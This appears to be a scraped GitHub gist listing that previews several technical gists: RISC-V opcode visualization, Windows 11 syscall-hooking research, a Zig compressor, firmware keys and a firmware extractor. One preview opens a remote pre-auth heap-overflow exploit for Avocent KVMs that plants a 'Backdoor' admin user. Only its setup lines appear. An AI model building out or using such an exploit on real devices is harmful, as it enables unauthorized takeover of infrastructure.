kn0 SpiralBL0CK

👋
View GitHub Profile
@SpiralBL0CK
SpiralBL0CK / README.md
Last active February 21, 2026 13:23 — forked from camel-cdr/README.md
Visualizing the RISC-V Instruction Set

Earlier today, I came across the blog post "Visualizing the ARM64 Instruction Set" and got inspired to give it a shot myself.

After hacking together a quick script and fiddling with the bit order and colors for way too long, I managed to create a decent visualization of the RISC-V instruction encoding. You can find my code below.

The following graphics cover the 64-bit part of the RISC-V ISA, including all ratified 64-bit extensions, with opcodes extracted from the riscv/riscv-opcodes repo.

I mapped the opcodes to 2D coordinates with a Morton space-filling curve.

@camel-cdr
camel-cdr / README.md
Created February 19, 2026 22:54
Visualizing the RISC-V Instruction Set

Earlier today, I came across the blog post "Visualizing the ARM64 Instruction Set" and got inspired to give it a shot myself.

After hacking together a quick script and fiddling with the bit order and colors for way too long, I managed to create a decent visualization of the RISC-V instruction encoding. You can find my code below.

The following graphics cover the 64-bit part of the RISC-V ISA, including all ratified 64-bit extensions, with opcodes extracted from the riscv/riscv-opcodes repo.

I mapped the opcodes to 2D coordinates with a Morton space-filling curve.

Syscall Provider

Background

SyscallProvider is a feature available from Windows 11 22H2 that allows inline hooking of syscalls.
This unfinished research was done on Windows 11 22H2. The feature is fully undocumented at the moment and it looks like it's locked to Microsoft-signed drivers.
All of the information here was gathered by manual reverse engineering of securekernel.exe, skci.dll and ntoskrnl.exe.
The kernel exports three functions to work with the new feature: PsRegisterSyscallProvider, PsQuerySyscallProviderInformation, PsUnregisterSyscallProvider.
This writeup will explore how this feature is initialized, how it works internally, and how to interact with it and use it.

const M = 12; // Probability scale for rANS state. Symbol frequencies in this log range. Usually 8-12.
const L = 23; // Renormalization factor to control dumping rANS state to bitstream. From rans_byte.h.
const m_min = 8 - 2 - (std.math.divCeil(u32, M, 4) catch unreachable); // Small-size-opt limit when compressing frequencies.
const m_max = [_]u16{m_min, m_min+16, m_min+16+256, m_min+16+256+4096, 1<<M}; // Size ranges for frequencies after small size limit.
fn compress(dst: anytype, src: []const u8) !void {
    // Histogram for the frequency of each byte in input.
    var hist = [_]u32{0} ** 256;
    for (src) |byte| hist[byte] += 1;
@NyanSatan
NyanSatan / t8110-ap_keys-281023.json
Created January 13, 2024 16:47
T8110 AP & SEP keys 28.10.23
@x27
x27 / MainCpuFirmwareExtract.cs
Created January 3, 2024 02:29
Extract Main CPU firmware from ICOM IC-R8600 firmware bundle (1.01-1.35 USA and non-USA versions)
/// <summary>
/// Extract Main CPU firmware from ICOM IC-R8600 firmware bundle (1.01-1.35 USA and non-USA versions)
/// non-USA versions:
/// https://www.icomjapan.com/support/firmware_driver/?product=IC-R8600(EUR)&frm_type=Firmware&old=true
/// USA versions:
/// https://www.icomjapan.com/support/firmware_driver/?product=IC-R8600&frm_type=Firmware&old=true
/// </summary>
/// <param name="bundle">Firmware bundle</param>
/// <returns>Unpacked data</returns>
static byte[] MainCpuFirmwareExtract(byte[] bundle)
@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211 # port is hardcoded in the binary
    usernm = username.encode()
@matteyeux
matteyeux / decrypted.json
Created November 20, 2023 13:15
Apple Vision Pro firmware keys for VisionOS 1.0 beta 1-5
@stevemk14ebr
stevemk14ebr / go_lib_typedefs.json
Last active October 13, 2023 19:15
Golang Standard Library Typedefs
This file has been truncated, but you can view the full file.
{
"archive_tar_headerError_Error": {
"result": "string",
"result_name": null,
"parameters": []
},
"archive_tar_sparseEntry_endOffset": {
"result": "int64",
"result_name": null,
"parameters": []